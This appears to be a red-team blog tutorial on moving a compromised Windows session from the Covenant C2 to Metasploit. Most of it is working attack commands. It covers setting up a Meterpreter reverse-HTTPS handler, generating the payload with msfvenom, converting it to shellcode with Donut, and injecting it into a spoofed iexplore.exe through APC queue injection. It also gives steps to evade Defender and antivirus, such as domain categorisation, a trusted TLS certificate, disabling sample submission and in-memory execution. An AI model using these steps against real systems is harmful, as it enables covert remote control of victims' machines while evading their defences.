PASSING A SHELL FROM COVENANT TO METASPLOIT // Tatula

Introduction

You might be wondering why i needed to move a shell/grunt from covenant to msf.

There are a couple of reasons, they include:

It is open source and actively developed.
Its supports large testing networks by making use of CIDR identifiers.
It offers smart payload generation and switching mechanism.
It has more exploits.
It offers recursive download of files.

I will divide it into two parts. Part one covers starting metasploit with a valid certificate and part two covers passing a shell to msf.

Part One

Starting Metasploit with a valid certificate

The first step is to make sure that you start metasploit with a valid certificate.

This step is very important as it will make sure your payload is not flagged by defender.

Step 1:

Domain Categorization

We will use a tool called Chameleon, it assists red teams in categorising their infrastructure under arbitrary categories.

Currently, the tool supports arbitrary categorisation for Bluecoat, McAfee Trustedsource and IBM X-Force.

Installation:

git clone https://github.com/mdsecactivebreach/Chameleon.git 
cd Chameleon/  
chmod +x chameleon.py

Usage:

Checking the category of your website against all supported proxies.

python3 chameleon.py --proxy a --check --domain DOMAIN.COM

[chameleon.png]

Check on virus total if your domain is clean. This checks if its flagged for phishing or malicious purposes.

[virustotal.png]

You can also check if its blacklisted on MXToolBox.

[mxtoolbox.png]

Step 2:

Domains AND DNS Configuration

We need to setup the DNS records. Login into namecheap. Select Domain list and choose a domain name.

[namecheap.png]

Then select manage, click the advanced DNS tab and start populating the various fields.

Create two A records (@ and www) that point to your mail server’s IP address.

[Arecord98.png]

Test your DNS propagation, use the A option using Dns checker.

[dnsArecord.png]

Step 3

HTTPS Certificate

We need to generate a https certificate for our msf. We are going to use Lets encrypt. Make sure you generate a certificate for DOMAIN.COM.

Install certbot

sudo apt-get install certbot python3-certbot-apache

[cerbot1.png]

This installs the certificate only.

sudo certbot certonly --apache --agree-tos --register-unsafely-without-email -d <Domain name>

[certbot2.png]

Restart the server.

reboot

Verify that you have a https certificate on your domain name.

[certbot4.png]

Step 4

Install Metasploit

I used Nightly-Installers wiki to install my msf.

[msf.png]

We then have to merge cert.pem and privatekey.pem to form one https certificate.

sudo cat /etc/letsencrypt/live/domainName.com/cert.pem /etc/letsencrypt/live/domainName.com/privkey.pem > domainName.pem

[https.png]

Step 5

Start Metasploit

We are going to start metasploit with this command

msfconsole

[startmsf.png]

We’ll use multi/handler exploit and populate the following options

use exploit/multi/handler  
 
set payload windows/x64/meterpreter/reverse_https  
 
set LHOST <IP>  
 
set LPORT <PORT>  
 
set HandlerSSLCert /home/t4tul4/Software/t4tul4.pem

[msf4.png]

Step 6

Process Injection

Start an msf payload using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=<PORT> -f exe > msfHttps.exe

[msfvenom.png]

Then convert the malicious exe to shellcode using Donut

./donut -a2 msfHttps.exe -o msfHttps.bin

[donut.png]

After generation of the payload we need to transfer the payload to your local host.

python3 -m http.server 8000

Execute the APC Queue Process Injection technique.

Process injection is a widespread defense evasion technique employed often within malware and fileless adversary tradecraft, and entails running custom code within the address space of another process.

It improves stealth and some techniques also achieve persistence.

I used 3xpl01tc0d3r process injection you can download from here

I used the fourth technique APC Queue.

An asynchronous procedure call (APC) is a function that executes asynchronously in the context of a particular thread.

When an APC is queued to a thread, the system issues a software interrupt. The next time the thread is scheduled, it will run the APC function.

I modified the code a bit and merged the parameters into one code.

Something to note is the options i used /f:base64, /t: 4 and i spoofed iexplore.exe.

Execute the payload

.\ProcessInjection.exe

On process hacker we can verify that the payload spawned iexplorer.exe.

Note: Always make sure that Automatic submission is off.

[Matokeo.png]

On msf we get a shell.

[matokeo1.png]

Part Two

Passing a shell from Covenant to Metasploit

Step 1

Start metasploit.

msfconsole

[msf4.png]

Step 2

Generate a grunt in covenant.

[pass2.png]

Step 3

Interact with your grunt, click on the task tab.

Choose Assembly on the GruntTask.

This option will execute our exe in memory, this is an additional layer of opsec as the AVs won’t detect it.

Add your exe on the choose file option.

Input any name on the AssemblyName.

If your exe has parameters input them on the Parameters section.

Click on Task to execute.

[pass3.png]

Step 4

Results

In Covenant

[cov1.png]

In Metasploit

[cov2.png]

Conclusion

This shows how one can move shells from one C2 to another. Its an important skill as it also acts as back up if one C2 gets burned. I hope you learned something from this short blog. Incase of any questions fell free to DM me. Happy Hacking !

Special Thanks

Special thanks to Truneski and Gabriel for reviewing my post.

Introduction

Part One

Starting Metasploit with a valid certificate

Step 1:

Domain Categorization

Step 2:

Domains AND DNS Configuration

Step 3

HTTPS Certificate

Step 4

Install Metasploit

Step 5

Start Metasploit

Step 6

Process Injection

Execute the APC Queue Process Injection technique.

Part Two

Passing a shell from Covenant to Metasploit

Step 1

Step 2

Step 3

Step 4

Conclusion

Special Thanks

References